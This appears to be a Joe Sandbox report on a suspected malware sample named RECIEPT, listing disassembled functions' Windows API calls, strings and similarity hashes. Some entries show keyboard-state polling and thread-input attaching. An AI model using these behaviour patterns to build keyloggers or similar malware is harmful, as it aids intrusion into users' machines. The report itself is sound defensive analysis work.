                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 1237572874-0
                                        • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                        • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                        • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                        • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                        • VariantInit.OLEAUT32(?), ref: 004793E1
                                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                        • VariantClear.OLEAUT32(?), ref: 00479489
                                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                        • VariantClear.OLEAUT32(?), ref: 004794CA
                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                        • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                        • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                        • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 0044480E
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                        • GetKeyState.USER32(000000A0), ref: 004448AA
                                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                        • GetKeyState.USER32(000000A1), ref: 004448D9
                                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                        • GetKeyState.USER32(00000011), ref: 00444903
                                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                        • GetKeyState.USER32(00000012), ref: 0044492D
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                        • GetKeyState.USER32(0000005B), ref: 00444958
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                        • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                        • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                        • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                        • String ID:
                                        • API String ID: 3413494760-0
                                        • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                        • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                        • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                        • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: AddressProc_free_malloc$_strcat_strlen
                                        • String ID: AU3_FreeVar
                                        • API String ID: 2634073740-771828931
                                        • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                        • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                        • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                        • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                        APIs
                                        • CoInitialize.OLE32 ref: 0046C63A
                                        • CoUninitialize.OLE32 ref: 0046C645
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                        • IIDFromString.OLE32(?,?), ref: 0046C705
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 2294789929-1287834457
                                        • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                        • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                        • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                        • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                        APIs
                                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                                        • ReleaseCapture.USER32 ref: 0047116F
                                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                        • API String ID: 2483343779-2107944366
                                        • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                        • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                        • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                        • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                        • _wcslen.LIBCMT ref: 00450720
                                        • _wcscat.LIBCMT ref: 00450733
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcscat_wcslen
                                        • String ID: -----$SysListView32
                                        • API String ID: 4008455318-3975388722
                                        • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                        • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                        • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                        • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                        APIs
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                        • GetParent.USER32 ref: 00469C98
                                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                        • GetParent.USER32 ref: 00469CBC
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 2360848162-1403004172
                                        • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                        • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                        • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                        • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                        • String ID:
                                        • API String ID: 262282135-0
                                        • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                        • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                        • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                        • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID:
                                        • API String ID: 312131281-0
                                        • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                        • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                        • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                        • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                        APIs
                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                        • SendMessageW.USER32(76AB23D0,00001001,00000000,?), ref: 00448E16
                                        • SendMessageW.USER32(76AB23D0,00001026,00000000,?), ref: 00448E25
                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                        • String ID:
                                        • API String ID: 3771399671-0
                                        • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                        • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                        • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                        • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00434643
                                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                        • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                        • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                        • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 0-1603158881
                                        • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                        • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                        • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                        • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                        • DestroyWindow.USER32(?), ref: 00426F50
                                        • UnregisterHotKey.USER32(?), ref: 00426F77
                                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                        • String ID: close all$v
                                        • API String ID: 4174999648-2732915201
                                        • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                        • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                        • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
